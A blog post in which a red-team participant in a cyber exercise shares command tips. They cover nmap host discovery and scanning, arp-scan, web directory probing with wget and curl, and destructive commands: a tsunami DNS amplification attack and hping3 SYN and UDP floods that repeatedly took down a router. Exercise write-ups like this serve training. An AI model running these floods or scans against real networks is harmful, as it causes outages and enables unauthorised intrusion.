Some Command Parameters for Pentesting Protected Environments

Recently I participated in an international cyber exercise as part of the red team. Our mission was to do as much as possible onto a network protected by blue teams with firewalls, IDS and SIEM solutions. I want to share here some small tips regarding parameters of some well-known commands:

As part ot the pentesting, the first challenge lies in discovering the live hosts and their running services. The most fruitful nmap parameter for me was limiting the search on a distinct port:

nmap -sP -PS443 192.168.10.* -oN 192_168_10_443.txt nmap -sP -PS80 192.168.10.* -oN 192_168_10_80.txt

You can vary your search on your distinct targets. If you are looking for FTP servers you might use 21, if mail server 25 and if chat server you might use 5222, 5223, or 5269.

Let’s say you found out that IP 192.168.10.130 is detected live. To dig deeper on that machine, you can try TCP SYN scan with NO PING option.

nmap -sS 192.168.10.130 -Pn

Let’s say you found out that telnet session on a router is reachable. First you might want to learn more about its OS (you can use -O or -A switch):

nmap -A -v 192.168.8.1

You can then try default passwords based on the model of the system. Additionally you might want to run nmap script for authentication:

nmap –script=auth 192.168.8.1 -p 23 Another option for host discovery is using ARP SCAN, it is very fruitful tool to be used on a protected environment:

arp-scan 192.168.0.0/16 –interface eth0 > 192.168.10.0.txt &

You can have a map of hosts by using arp-scan command.

If there are web servers on your target environment, it is possible of course using tools such as Nikto, NetSparker etc. But first of all it is wise to see what is available as directory basis:

wget -r -np -nH –cut-dirs=3 -R home.php http://192.168.8.121/cybersphinx/index.php

Then to check out http OPTIONS (maybe PUT is available):

curl -X OPTIONS -v http://192.168.8.121/cybersphinx/index.php Blue teams usually focus on well known services, thust on this kind of gameplay, it looks me wise to prepare attacking vectors for less expected services. For example if there is SIEM solution, you can search for Elastic Search exploits, if there is a chat server, you can search for XMPP vulnerabilities. Finally, the last phase of the gameplay was free shot. You can use all the destructive commands agains the target network.

Here DNS Amplification and DOS attacks were fruitful attacking verctors for me. For DNS Amplification I used tsunami against target web server:

./tsunami -s 192.168.8.121 -p 100 -f recursive_dns.txt

While running this code, you can run at the same time hping command (hping3 192.168.8.121) to follow responses and reaction by target host.

You can use hping command for DOS purposes as well, below is a sample one for chat server:

hping3 -c 1000000 -d 1000 -S -w 64 -p 5222 -i u1000 192.168.8.166 Attacking directly to routers is also effective in such cases. I first ran nmap for UDP services:

nmap -sU 192.168.8.1

There I saw port 67 was open on the router. Then I could implement again hping which resulted in the router to be out of service and had to be restarted several times:

hping3 –udp -p 10000 –destport 67 –flood 192.168.8.1

The following nmap command searches for DDOS reflection UDP services, you can try it for determining open UDP services allowing DOS attacks to be placed:

nmap –sU –A –PN –n –pU:19,53, 67,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.8.0/24

I’m open your feedback and recommendations for other useful command parameters.